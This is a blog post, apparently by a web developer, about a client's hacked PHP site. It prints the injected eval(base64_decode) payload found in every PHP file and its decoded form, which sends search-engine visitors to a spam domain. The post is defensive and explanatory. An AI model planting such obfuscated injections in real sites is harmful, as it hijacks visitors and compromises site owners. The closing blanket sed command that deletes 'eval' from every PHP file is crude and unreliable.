I recently had a client call me and tell me their site was linking to a spam site from a Google search. Turns out that searching for their company name from several major search engines took users to the spam site, however typing the URL in directly revealed the site properly. After a bit of digging around I found some Base 64 encoding on a couple of the controlling PHP files. Base64 is a group of similar encoding schemes that represent binary data in an ASCII string format by translating it into a radix-64 representation (Wikipedia). Needless to say, it is quite unreadable to the average human. Hackers love using it on compromised pages because it is not readily apparent what is happening. Many free WordPress templates also contain Base 64 encoded data in the footer with advertisements. Though Base 64 encoded data may be legitimate PLEASE NEVER IGNORE BASE 64 ENCODING!! If you built the website you should know if it should be there, but if you are working on a site someone else developed always check the Base 64 data to make sure it is not a hack of some sort.

Now, let me show you what happened to my client. The primary FTP account was compromised allowing the hacker to modify files. Probably with a script, the hacker changed all files with a .php extension in a clever way. <?php denote the beginning of a PHP section and the Base 64 code simply replaced that code with it’s own. This is what I found:

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOyAkbm
Njdj1oZWFkZXJzX3NlbnQoKTsgaWYgKCEkbmNjdil7ICRyZWZlcmVyPSRfU0VSVk
VSWydIVFRQX1JFRkVSRVInXTsgJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTl
QnXTsgaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmV
mZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpKSB7IGlmICg
hc3RyaXN0cigkcmVmZXJlciwic2l0ZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJjY
WNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsgaGVhZGVyKCJM
b2NhdGlvbjogaHR0cDovL2ZnaGhnaGZzNmZnLm9zYS5wbC8iKTsgZXhpdCgpOyB9IH0gfSI='));

That line instructs PHP to decode the Base 64 strand and run whatever PHP code it contained. I copied the Base 64 data and decoded it myself and this is what I found:

error_reporting(0); $nccv=headers_sent(); if (!$nccv){
 $referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
 if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://fghhghfs6fg.osa.pl/"); exit(); } } }

What this code is doing is checking where the user came from and if it was from yahoo, google, or bing the user would be forwarded to the fghhghfs6fg.osa.pl site, which is nothing but spam.

So the moral of the story is that you need to ensure you and all your clients have secure passwords and maintain a vigil for inappropriate data in the system, especially if that data is Base 64 because it can be executing anything. My client was lucky this time that the code was fairly harmless, but it could have done anything from redirecting the site to stealing user information to destroying the database.

Edit (02-24-2011):

If you have shell access to your host you can run the following command to temporarily disable the eval code

find ./ -iname “*.php” -type f -exec sed -i ‘s/eval//’ {} \;